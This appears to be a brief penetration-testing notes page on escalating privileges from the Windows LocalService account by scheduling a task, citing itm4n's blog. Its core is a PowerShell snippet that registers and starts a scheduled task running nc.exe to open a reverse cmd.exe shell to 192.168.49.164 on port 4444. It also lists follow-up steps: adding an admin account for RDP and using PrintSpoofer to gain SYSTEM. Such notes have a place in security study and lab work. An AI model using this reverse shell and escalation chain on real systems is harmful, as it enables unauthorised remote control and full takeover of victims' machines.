localservice Priv Esc

​
When you are in local service account, you can regain permissions by scheduling a task
Give Me Back My Privileges! Please? | itm4n's blog
​
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4444 -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "Grants"
Start-ScheduledTask -TaskName "Grants"
​

Create a new account (with Admin access) for RDP

Printspoofer PE(instantly become System!)

Last modified 10mo ago